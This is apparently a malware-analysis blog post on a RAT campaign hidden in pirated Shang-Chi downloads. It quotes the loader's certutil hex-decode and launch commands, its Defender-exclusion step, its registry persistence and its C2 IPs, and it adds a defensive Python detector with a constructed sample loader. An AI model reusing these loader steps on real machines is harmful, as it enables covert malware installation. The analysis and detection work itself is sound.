The Shang-Chi Malware Campaign: Is your pirated copy of the summer blockbuster laced with a RAT?

Published on October 12, 2021

A recent campaign is spreading malware embedded in pirated copies of popular summer blockbusters such as Shang-Chi and the Legend of the Ten Rings. Threat actors have been shipping malware inside pirated movies that are readily available on torrent networks. In such campaigns, a corrupted movie file tricks the user into running a batch program that supposedly installs a compatible CODEC for the video.

In some cases, the video stops during playback and prompts the user to run the bundled batch program to install the missing CODECs. In other cases, the download includes a README file instructing the user to run the same batch file. The dropper masquerades as a .srt file (a legitimate file type that holds a video's subtitles); in this case, the file is a hexadecimal-encoded dropper written in C++ [-1-].

Screenshot: the files downloaded along with the corrupted movie

In the above screenshot, the subtitle file named ‘75095_VTS.srt’ contains the encoded payload, and the file named ‘Ultra XVid Codec Setup.bat’ contains the loader batch program of the malware.


Technical Analysis

The loader batch program file has two parts:

1. UAC elevation: The code segment below is responsible for re-launching the batch program as administrator by requesting UAC elevation. The exact code is taken from a Stack Overflow answer [-2-].

Screenshot: the code responsible for running the batch program as administrator

The code segment below is part of the same batch program, but it runs only after the elevation step, with administrator privileges. It executes two PowerShell commands that exclude the file types ‘.exe’ and ‘.srt’ from security monitoring.

Screenshot: the part of the batch program that runs with administrator privileges

The ‘ping’ command is used as a sleep mechanism.

2. Malware deployment: The final delivery of payload is via the ‘certutil’ application on Windows. Certutil has been abused by adversaries as a ‘living off the land’ tactic for deploying malware stagers and loaders.

The batch program decodes the hexadecimal-encoded .srt payload into a second .srt file which, once decoded, is a Windows executable that can be run directly. The command used for decoding is:

certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt

Screenshot: properties of the decoded executable file

Finally, the batch program launches the malware by executing the decoded file (a PE executable despite its .srt extension) with the following command: start 75095_VTS_tmp.srt
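A static triage check for the two companion files described above, written as an added example for this write-up rather than code from the original analysis. It flags the loader stages the post lists (Defender exclusions, ping as sleep, certutil -decodehex, launching the decoded .srt) and reports whether a "subtitle" file decodes to a PE header; the Add-MpPreference cmdlet name and all sample inputs are assumptions constructed for the example.

```python
import re

# One regex per loader stage the write-up describes. The Defender cmdlet name
# (Add-MpPreference -ExclusionExtension) is an assumption: the post only says
# two PowerShell commands exclude .exe and .srt from security monitoring.
STAGE_PATTERNS = {
    "defender_exclusion": re.compile(
        r"powershell.*Add-MpPreference\s+-ExclusionExtension\s+\S*\.(exe|srt)", re.I),
    "ping_sleep": re.compile(r"\bping\b.*\s-n\s+\d+", re.I),
    "certutil_decodehex": re.compile(r"\bcertutil\b.*-decodehex\b.*\.srt", re.I),
    "start_srt_as_exe": re.compile(r"^\s*start\s+\S+\.srt\b", re.I | re.M),
}


def triage_batch(text):
    """Return the set of loader stages whose indicators appear in a .bat file."""
    return {name for name, rx in STAGE_PATTERNS.items() if rx.search(text)}


def decode_hex_srt(text):
    """Approximate what 'certutil -decodehex' does to the fake subtitle file:
    drop whitespace and decode the hex. Returns None for a genuine .srt,
    which is not pure hex."""
    compact = re.sub(r"\s+", "", text)
    if not compact or len(compact) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", compact):
        return None
    return bytes.fromhex(compact)


def looks_like_pe(blob):
    """A decoded 'subtitle' that starts with the MZ DOS header is an executable."""
    return blob is not None and blob[:2] == b"MZ"


# Constructed sample loader, modelled on the stages the post describes.
SAMPLE_BAT = r"""@echo off
powershell -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell -Command "Add-MpPreference -ExclusionExtension '.srt'"
ping 127.0.0.1 -n 5 > nul
certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt
start 75095_VTS_tmp.srt
"""
# Constructed hex "payload": only an MZ header stub, not a real binary.
SAMPLE_SRT = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00\n"
# Constructed genuine subtitle file for comparison.
REAL_SRT = "1\n00:00:01,000 --> 00:00:04,000\nHello.\n"

if __name__ == "__main__":
    print(sorted(triage_batch(SAMPLE_BAT)))
    print(looks_like_pe(decode_hex_srt(SAMPLE_SRT)), looks_like_pe(decode_hex_srt(REAL_SRT)))
```

A .bat that hits all four stages together with an .srt that decodes to an MZ header is a strong signal of this loader; a real subtitle file never decodes.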

The final executable payload can be easily detected by over 60 security vendors.

Screenshot: detection of the payload by 61 security vendors


Detailed Analysis

Our analysis has revealed that:

  • The final payload shows the characteristics of a very generic RAT (Remote Access Trojan).
  • Droppings: Files are dropped to the C:\Users\SYM\AppData\Local\Route0\ directory. Among the dropped files are two executables: route.exe and zroute.exe.
  • Persistence: The malware modifies the registry of the victim machine to persist on the system by adding the value “11f86284” to the key Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The value points to the route.exe file in the C:\Users\SYM\AppData\Local\Route0\ directory, so the malware survives system restarts.

Screenshot: the changed value of the Run key

Campaign History

A quick Google search for the filenames linked to this campaign reveals a plethora of domains hosting the same malicious files under similar names. Since these domains have high page rankings, they appear at the top of Google’s search results. This is not a coincidence but a deliberate strategy: threat actors dupe unsuspecting users into visiting infected domains and downloading corrupted files.

Attackers target sites running common and popular CMSs (Content Management Systems), take control of the application, and use it to host their infected files. In peer-to-peer networks such as torrents, it is not uncommon to see pirated movies used as bait to lure users into downloading infected files.

Malicious torrent files are hosted on compromised domains with high SEO and page ranks. Attackers exploit popular and trending movie titles to link to files that are not even valid movies, such as a corrupted video file that, when played, displays an error box and pushes the user to run the malicious script bundled with the pirated movie to "resolve" the missing CODEC issue.

Sources that host malicious files

Screenshot: Google search results for sources hosting malicious files bundled with movie files


References

[-1-] https://www.seedr.cc/zip/131251833?st=582eb00e4f3474cc78843f78d711032d370e6045ff20ac01cf9850764c620c0e&e=1630886510

[-2-] https://stackoverflow.com/questions/7044985/how-can-i-auto-elevate-my-batch-file-so-that-it-requests-from-uac-administrator


Indicators of Compromise

C2 servers:
  • 81.89.133.248
  • 20.50.102.62

IP Addresses and DNS
